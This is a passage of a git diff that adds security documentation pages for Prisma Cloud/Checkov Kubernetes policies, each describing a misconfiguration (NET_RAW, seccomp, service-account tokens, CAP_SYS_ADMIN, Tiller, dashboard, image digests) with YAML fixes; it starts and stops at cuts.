-name: + hostPath: +- path: /var/run/docker.sock +---- + +[source,cronjob] +---- +apiVersion: batch/v1beta1 +kind: CronJob +metadata: + name: +spec: + schedule: <> + jobTemplate: + spec: + template: + spec: + volumes: + -name: + hostPath: + - path: /var/run/docker.sock +---- + +[source,text] +---- +apiVersion: <> +kind: +metadata: + name: +spec: + template: + spec: + volumes: + -name: + hostPath: + - path: /var/run/docker.sock +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-27.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-27.adoc new file mode 100644 index 000000000..a630bbc1c --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-27.adoc @@ -0,0 +1,62 @@ +== Admission of containers with NET_RAW capability is not minimized +// Admission of containers with NET_RAW capability not minimized + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| fca26197-9f75-4188-9a4f-c16f6903479d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py[CKV_K8S_28] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +NET_RAW capability allows the binary to use RAW and PACKET sockets as well as binding to any address for transparent proxying. +The _ep_ stands for "`effective`" (active) and "`permitted`" (allowed to be used). +With Docker as the container runtime NET_RAW capability is enabled by default and may be misused by malicious containers. +We recommend you define at least one PodSecurityPolicy (PSP) to prevent containers with NET_RAW capability from launching. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Arguments:* securityContext:capabilities:drop (Optional) Capabilites field allows granting certain privileges to a process without granting all the privileges of the root user. +when *drop* includes *ALL* or *NET_RAW*, the *NET_RAW* capability is disabled. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + securityContext: + capabilities: + drop: ++ - NET_RAW ++ - ALL +---- \ No newline at end of file diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-28.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-28.adoc new file mode 100644 index 000000000..d5b6c11d8 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-28.adoc @@ -0,0 +1,93 @@ +== securityContext is not applied to pods and containers in container context +// securityContext not applied to pods and containers in container context + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9fe4c2a9-e01d-4030-8900-1f1f2cab722f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py[CKV_K8S_30] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Terraform,Helm,Kustomize + +|=== + + + +=== Description + + +*securityContext* defines privilege and access control settings for your pod or container, and holds security configurations that will be applied to a container. +Some fields are present in both *securityContext* and *PodSecurityContext*. When both are set, *securityContext* takes precedence. +Well-defined privilege and access control settings will enhance assurance that your pod is running with the properties it requires to function. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container / Pod / Deployment / DaemonSet / StatefulSet / ReplicaSet / ReplicationController / Job / CronJob +* *Arguments:* securityContext (Optional) A field that defines privilege and access control settings for your Pod or Container. + + +[source,container] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: ++ securityContext: +---- + +[source,pod] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: ++ securityContext: +---- + +[source,cronjob] +---- +apiVersion: batch/v1beta1 +kind: CronJob +metadata: + name: +spec: + schedule: <> + jobTemplate: + spec: + template: + spec: ++ securityContext: +---- + +[source,text] +---- +apiVersion: <> +kind: +metadata: + name: +spec: + template: + spec: ++ securityContext: +---- \ No newline at end of file diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-29.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-29.adoc new file mode 100644 index 000000000..f62fbabbe --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-29.adoc @@ -0,0 +1,96 @@ +== Seccomp is not set to Docker/Default or Runtime/Default + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| fd6729ef-efdb-4fff-9afa-dc005f192ea5 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/Seccomp.py[CKV_K8S_31] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Helm, Kustomize + +|=== + + + +=== Description + + +Secure computing mode (seccomp) is a Linux kernel feature used to restrict actions available within the container. +The seccomp() system call operates on the seccomp state of the calling process. +The default seccomp profile provides a reliable setting for running containers with seccomp and disables non-essential system calls. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Pod / Deployment / DaemonSet / StatefulSet / ReplicaSet / ReplicationController / Job / CronJob +* *Arguments:* securityContext: seccompProfile: type: (Optional: Kubernetes > v1.19) Addition of seccompProfile type: RuntimeDefault or DockerDefault + + +[source,pod] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + securityContext: ++ seccompProfile: ++ type: RuntimeDefault + or ++ type: DockerDefault +---- + + +[source,cronjob] +---- +apiVersion: batch/v1beta1 +kind: CronJob +metadata: + name: +spec: + schedule: <> + jobTemplate: + spec: + template: + spec: + securityContext: ++ seccompProfile: ++ type: RuntimeDefault + or ++ type: DockerDefault +---- + +[source,text] +---- +apiVersion: <> +kind: +metadata: + name: +spec: + template: + spec: + securityContext: ++ seccompProfile: ++ type: RuntimeDefault + or ++ type: DockerDefault +---- \ No newline at end of file diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-3.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-3.adoc new file mode 100644 index 000000000..d6e95dfca --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-3.adoc @@ -0,0 +1,99 @@ +== Containers wishing to share host IPC namespace admitted +// Containers allowed to share host IPC namespace + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 02c6acab-8581-41b5-922c-91ba79eb0f01 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/ShareHostIPCPSP.py[CKV_K8S_3] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +The host IPC namespace controls whether a pod's containers can be shared. +You can administer cluster-level restrictions to ensure that containers remain isolated using *PodSecurityPolicy* and ensuring *hostIPC* is set to *False*. +Preventing sharing of host *PID/IPC* namespace, networking, and ports ensures proper isolation between Docker containers and the underlying host. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* PodSecurityPolicy +* *Arguments:* hostIPC Determines if the policy allows the use of HostIPC in the pod spec. + + +[source,yaml] +---- +apiVersion: policy/v1beta1 +kind: PodSecurityPolicy +metadata: + name: +spec: ++ hostIPC: false +---- + + +To use a **PodSecurityPolicy** resource, the requesting user or target pod's service account must be authorized to use the policy. +The preferred method is to grant access to the service account. + +In the following example we use **RBAC**, a standard Kubernetes authorization mode. + +A *Role* or *ClusterRole* must grant access to *use* the desired policies. + +*Kind*: ClusterRole + + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: +rules: +- apiGroups: ['policy'] + resources: ['podsecuritypolicies'] + verbs: ['use'] + resourceNames: + - +---- + +The **ClusterRole **is then bound to the authorized service(s): + +*Kind*: ClusterRoleBinding + + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: +roleRef: + kind: ClusterRole + name: + apiGroup: rbac.authorization.k8s.io +subjects: +- kind: ServiceAccount + name: + namespace: +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-30.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-30.adoc new file mode 100644 index 000000000..8f85d4e7d --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-30.adoc @@ -0,0 +1,89 @@ +== seccomp profile is not set to Docker/Default or Runtime/Default +// Secure computing mode (seccomp) profile not set to Docker/Default or Runtime/Default + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 36e37c7d-0a14-4dd9-b96e-f5bfba199223 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/SeccompPSP.py[CKV_K8S_32] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +Secure computing mode (seccomp) is a Linux kernel feature used to restrict actions available within the container. +The seccomp() system call operates on the seccomp state of the calling process. +The default seccomp profile provides a reliable setting for running containers with seccomp and disables non-essential system calls. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Pod / Deployment / DaemonSet / StatefulSet / ReplicaSet / ReplicationController / Job / CronJob +* *Arguments:* metadata:annotations (Optional) Annotations attach arbitrary non-identifying metadata to objects. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: + annotations: ++ seccomp.security.alpha.kubernetes.io/pod: "docker/default" + or ++ seccomp.security.alpha.kubernetes.io/pod: "runtime/default" +---- + + +[source,cronjob] +---- +apiVersion: batch/v1beta1 +kind: CronJob +metadata: + name: +spec: + schedule: <> + jobTemplate: + spec: + template: + metadata: + annotations: + + seccomp.security.alpha.kubernetes.io/pod: "docker/default" + or + + seccomp.security.alpha.kubernetes.io/pod: "runtime/default" +---- + +[source,text] +---- +apiVersion: <> +kind: +metadata: + name: +spec: + template: + metadata: + annotations: ++ seccomp.security.alpha.kubernetes.io/pod: "docker/default" + or ++ seccomp.security.alpha.kubernetes.io/pod: "runtime/default" +---- \ No newline at end of file diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-31.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-31.adoc new file mode 100644 index 000000000..2077dd20b --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-31.adoc @@ -0,0 +1,61 @@ +== Kubernetes dashboard is deployed +// Kubernetes dashboard deployed + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e45f89a2-eb9f-4c9e-80d2-feb559094c3a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py[CKV_K8S_33] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Helm, Kustomize + +|=== + + + +=== Description + + +The Terraform provider for Azure enables the capability to disable the Kubernetes dashboard on an AKS cluster. +This is achieved by providing the Kubernetes dashboard as an AKS add-on, similar to the Azure Monitor, for containers integration, AKS virtual nodes, and the HTTP application routing. +In mid-2019 Tesla was hacked where their kube-dashboard was exposed to the internet. +Hackers browsed around, found credentials, and deployed pods running bitcoin mining software. +We recommend you disable the kube-dashboard if it's not needed, to prevent the need to manage its individual access interface and limit it as an attack vector. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Arguments:* labels:app / k8s-app - specifies the app label for the pod image - defines the image used by the container + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: + labels: +- app: kubernetes-dashboard +- k8s-app: kubernetes-dashboard +spec: + containers: + - name: +- image: kubernetes-dashboard +- image: kubernetesui +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-32.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-32.adoc new file mode 100644 index 000000000..4a4317d66 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-32.adoc @@ -0,0 +1,75 @@ +== Tiller (Helm V2) is deployed +// Tiller (Helm V2) deployed + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 33a62b66-1d80-43ce-ae26-e0d328c1b402 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/Tiller.py[CKV_K8S_34] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +Tiller (Helm v2) is the in-cluster component of Helm. +It interacts directly with the Kubernetes API server to install, upgrade, query, and remove Kubernetes resources. +It also stores the objects that represent releases. +Its permissive configuration could grant the users a broad range of permissions. +New versions of Kubernetes and Helm v3 have made Tiller obsolete, with its over permissive function in existing workloads remaining a security liability. +Consider upgrading to use Helm v3, which only runs on client machines. +Not all charts may support Helm 3, but the number that do is growing rapidly. + +//// +=== Fix - Runtime + + +* CLI Command* + + +`helm reset` +Or, use `helm reset --force` to force the removal if charts are installed. +You still need to remove the releases manually. +//// + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Arguments:* labels:app / name - specifies the app label for the pod image - defines the image used by the container + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: + labels: +- app: helm +- name: tiller +spec: + containers: + - name: +- image: tiller +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-33.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-33.adoc new file mode 100644 index 000000000..cfd23d1d5 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-33.adoc @@ -0,0 +1,77 @@ +== Secrets used as environment variables + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| edf8a515-8e86-4931-bc82-094d5de3258f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/Secrets.py[CKV_K8S_35] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +Secrets can be mounted as data volumes or exposed as environment variables and used by a container in a pod to interact with external systems on your behalf. +Secrets can also be used by other parts of the system, without being directly exposed to the pod. +Benefits for storing secrets as files include: setting file permissions, projects of secret keys to specific paths, and consuming secret values from volumes. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Arguments:* env:valueFrom:secretKeyRef - uses a secret in an environment variable in a Pod envFrom:secretRef - defines all of the secret's data as the container environment variables + + +[source,valueFrom] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + env: + - name: + valueFrom: +- secretKeyRef: +- name: +- key: +---- + + +[source,envFrom] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + envFrom: +- - secretRef: +- name: +---- \ No newline at end of file diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-34.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-34.adoc new file mode 100644 index 000000000..e25d95394 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-34.adoc @@ -0,0 +1,63 @@ +== Admission of containers with capabilities assigned is not limited +// Admission of containers with capabilities assigned not limited + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7d672908-064b-4d17-af1d-bea9d94ebf3f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py[CKV_K8S_37] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +Docker has a default list of capabilities that are allowed for each container of a pod. +The containers use the capabilities from this default list, but pod manifest authors can alter it by requesting additional capabilities, or dropping some of the default capabilities. +Limiting the admission of containers with capabilities ensures that only a small number of containers have extended capabilities outside the default range. +This helps ensure that if a container becomes compromised it is unable to provide a productive path for an attacker to move laterally to other containers in the pod. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Arguments:* securityContext:capabilities:drop (Optional) + +Capabilities field allows granting certain privileges to a process without granting all the privileges of the root user. +when *drop* includes *ALL*, all of the root privileges are disabled for that container. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + securityContext: + capabilities: + drop: ++ - ALL +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-35.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-35.adoc new file mode 100644 index 000000000..cad39b114 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-35.adoc @@ -0,0 +1,83 @@ +== Service account tokens are not mounted where necessary +// Service Account tokens not mounted where necessary + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c086fb0e-c3eb-47ad-9d70-32e62fd3f467 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py[CKV_K8S_38] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Helm, Kustomize + +|=== + + + +=== Description + + +One way to authenticate the API is by using the Service Account token. +*ServiceAccount* is an object managed by Kubernetes and used to provide an identity for processes that run in a pod. +Every service account has a secret related to it, this secret contains a bearer token. +This is a JSON Web Token (JWT), a method for representing claims securely between two parties. +This Service Account token is being used during the authentication stage and can become useful for attackers if the service account is privileged and they have access to such a token. +With this token an attacker can easily impersonate the service account and use REST APIs. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Pod / Deployment / DaemonSet / StatefulSet / ReplicaSet / ReplicationController / Job / CronJob +* *Arguments:* automountServiceAccountToken (Optional) When set to false, you can opt out of automating API credentials for a service account. + + +[source,pod] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: ++ automountServiceAccountToken: false +---- + +[source,cronjob] +---- +apiVersion: batch/v1beta1 +kind: CronJob +metadata: + name: +spec: + schedule: <> + jobTemplate: + spec: + template: + spec: ++ automountServiceAccountToken: false +---- + +[source,text] +---- +apiVersion: <> +kind: +metadata: + name: +spec: + template: + spec: ++ automountServiceAccountToken: false +---- \ No newline at end of file diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-36.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-36.adoc new file mode 100644 index 000000000..c384a454f --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-36.adoc @@ -0,0 +1,60 @@ +== CAP_SYS_ADMIN Linux capability is used +// 'CAP_SYS_ADMIN' Linux capability used + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 367ae3af-e9f6-4c76-a72b-021dfac4e38d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py[CKV_K8S_39] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +Capabilities permit certain named root actions without giving full root access and are considered a fine-grained permissions model. +We recommend all capabilities should be dropped from a pod, with only those required added back. +There are a large number of capabilities, with CAP_SYS_ADMIN bounding most. +CAP_SYS_ADMIN is a highly privileged access level equivalent to root access and should generally be avoided. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Arguments:* securityContext:capabilities:add (Optional) Add capabilities field allows granting certain privileges to a process. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + securityContext: + capabilities: + add: +- -SYS_ADMIN +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-37.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-37.adoc new file mode 100644 index 000000000..22125a77a --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-37.adoc @@ -0,0 +1,95 @@ +== Containers do not run with a high UID + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1e4d1db0-70d8-4dad-ae2f-f9ce1b06b107 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py[CKV_K8S_40] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Helm, Kustomize + +|=== + + + +=== Description + + +Linux namespaces provide isolation for running processes and limits access to system resources. +To prevent privilege-escalation attacks from within a container, we recommend that you configure your container's applications to run as unprivileged users. +The mapped user is assigned a range of UIDs which function within the namespace as normal UIDs from 0 to 65536, but have no privileges on the host machine itself. +If a process attempts to escalate privilege outside of the namespace, the process is running as an unprivileged high-number UID on the host, not mapped to a real user. +This means the process has no privileges on the host system and cannot be attacked by this method. +This check will trigger below UID 10,000 as common linux distributions will assign UID 1000 to the first non-root, non system user and 1000 users should provide a reasonable buffer. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Pod / Deployment / DaemonSet / StatefulSet / ReplicaSet / ReplicationController / Job / CronJob +* *Arguments:* runAsUser (Optional) Specifies the User ID that processes within the container and/or pod run with. + + +[source,pod] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + securityContext: ++ runAsUser: +---- + +[source,cronjob] +---- +apiVersion: batch/v1beta1 +kind: CronJob +metadata: + name: +spec: + schedule: <> + jobTemplate: + spec: + template: + spec: + containers: + - name: + image: + securityContext: ++ runAsUser: +---- + +[source,text] +---- +apiVersion: <> +kind: +metadata: + name: +spec: + template: + spec: + containers: + - name: + image: + securityContext: + runAsUser: +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-38.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-38.adoc new file mode 100644 index 000000000..9d80bdd5e --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-38.adoc @@ -0,0 +1,98 @@ +== Default service accounts are actively used + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 51515bb4-26e1-4860-8f9e-a31e76f25740 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py[CKV_K8S_41] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + +=== Description + + +Every Kubernetes installation has a service account called _default_ that is associated with every running pod. +Similarly, to enable pods to make calls to the internal API Server endpoint, there is a *ClusterIP* service called _Kubernetes_. +This combination makes it possible for internal processes to call the API endpoint. +We recommend that users create their own user-managed service accounts and grant the appropriate roles to each service account. + +=== Fix - Buildtime + + +*Kubernetes* + + + + +*Option 1* + + +* *Resource:* ServiceAccount +* *Arguments:* If service name is set to default, *automountServiceAccountToken* should be set to false in order to opt out of automounting API credentials for a service account. + + +[source,default service] +---- +apiVersion: v1 +kind: ServiceAccount +metadata: + name: default ++ automountServiceAccountToken: false +---- + + +[source, non-default service] +---- +apiVersion: v1 +kind: ServiceAccount +metadata: ++ name: +---- + + +*Option 2* + + +* *Resource:* RoleBinding / ClusterRoleBinding +* *Arguments:* *RoleBinding* grants the permissions defined in a role to a user or set of users within a specific namespace. + +*ClusterRoleBinding* grants that access cluster-wide. +To avoid activating the default service account, it should not be used as a subject in *RoleBinding* or *ClusterRoleBinding* resources. + + +[source,RoleBinding] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: RoleBinding +metadata: + name: +subjects: +-- kind: ServiceAccount +- name: default +---- + +[source,ClusterRoleBinding] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: +subjects: +-- kind: ServiceAccount +- name: default +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-39.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-39.adoc new file mode 100644 index 000000000..b15703936 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-39.adoc @@ -0,0 +1,99 @@ +== Images are not selected using a digest +// Images not selected using a digest + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 77c34141-aca8-4c26-8d6c-f894b8c51c71 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/ImageDigest.py[CKV_K8S_43] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Terraform,Helm,Kustomize + +|=== + + + +=== Description + + +In some cases you may prefer to use a fixed version of an image, rather than update to newer versions. +Docker enables you to pull an image by its digest, specifying exactly which version of an image to pull. +Pulling using a digest allows you to "`pin`" an image to that version, and guarantee that the image you're using is always the same. +Digests also prevent race-conditions; +if a new image is pushed while a deploy is in progress, different nodes may be pulling the images at different times, so some nodes have the new image, and some have the old one. +Services automatically resolve tags to digests, so you don't need to manually specify a digest. + +//// +=== Fix - Runtime + + +* CLI Command* + + +To make sure the container always uses the same version of the image, you can specify its digest; +replace `& lt;image-name>:& lt;tag>` with `& lt;image-name>@& lt;digest>` (for example, `image@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2`). +The digest uniquely identifies a specific version of the image, so it is never updated by Kubernetes unless you change the digest value. +//// + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* image +* *Arguments:* digest + + +[source,Container] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: image@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 +---- + +[source,image] +---- +{ + "creator": 7, + "id": 2110, + "image_id": null, + "images": [ + { + "architecture": "amd64", + "features": "", + "variant": null, ++ "digest": "sha256:1ae98b2c895d1ceeba8913ff79f422f005b7f967a311da520a88ac89180b4c39", + "os": "linux", + "os_features": "", + "os_version": null, + "size": 87342331 + } + ], + "last_updated": "2017-04-06T20:16:24.015937Z", + "last_updater": 2215, + "last_updater_username": "stackbrew", + "name": "centos5", + "repository": 54, + "full_size": 87342331, + "v2": true + } +---- \ No newline at end of file diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-4.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-4.adoc new file mode 100644 index 000000000..0261e9638 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-4.adoc @@ -0,0 +1,100 @@ +== Containers wishing to share host network namespace admitted +// Containers allowed to share host network namespace + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c6547e88-c701-4283-bb52-c415ff0340bd + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespacePSP.py[CKV_K8S_4] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +In a Kubernetes cluster, every pod gets its own IP address. +Pods can be treated much like VMs or physical hosts from the perspectives of port allocation, naming, service discovery, load balancing, application configuration, and migration. +Sharing the host network namespace breaks the isolation between container images and can make the host visible to other containers in the pod. +In some cases, pods in the host network of a node can communicate with all pods on all nodes without using network address translation (NAT). + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* PodSecurityPolicy +* *Arguments:* hostNetwork (Optional) When set to false, Pods are unable to use their host's network namespace. + + +[source,yaml] +---- +apiVersion: policy/v1beta1 +kind: PodSecurityPolicy +metadata: + name: +spec: ++ hostNetwork: false +---- + + +To use a **PodSecurityPolicy** resource, the requesting user or target pod's service account must be authorized to use the policy. +The preferred method is to grant access to the service account. + +In the following example we use **RBAC**, a standard Kubernetes authorization mode. + +A *Role* or *ClusterRole* needs to grant access to *use* the desired policies. + +*Kind*: ClusterRole + + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: +rules: +- apiGroups: ['policy'] + resources: ['podsecuritypolicies'] + verbs: ['use'] + resourceNames: + - +---- + +The **ClusterRole** is then bound to the authorized service(s): + +*Kind*: ClusterRoleBinding + + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: +roleRef: + kind: ClusterRole + name: + apiGroup: rbac.authorization.k8s.io +subjects: +- kind: ServiceAccount + name: + namespace: +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-40.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-40.adoc new file mode 100644 index 000000000..940cc5b31 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-40.adoc @@ -0,0 +1,118 @@ +== Tiller (Helm V2) deployment is accessible from within the cluster +// Tiller (Helm V2) deployment accessible from inside the cluster + +=== Policy Details + +[width=45%] +[cols="1,1"] 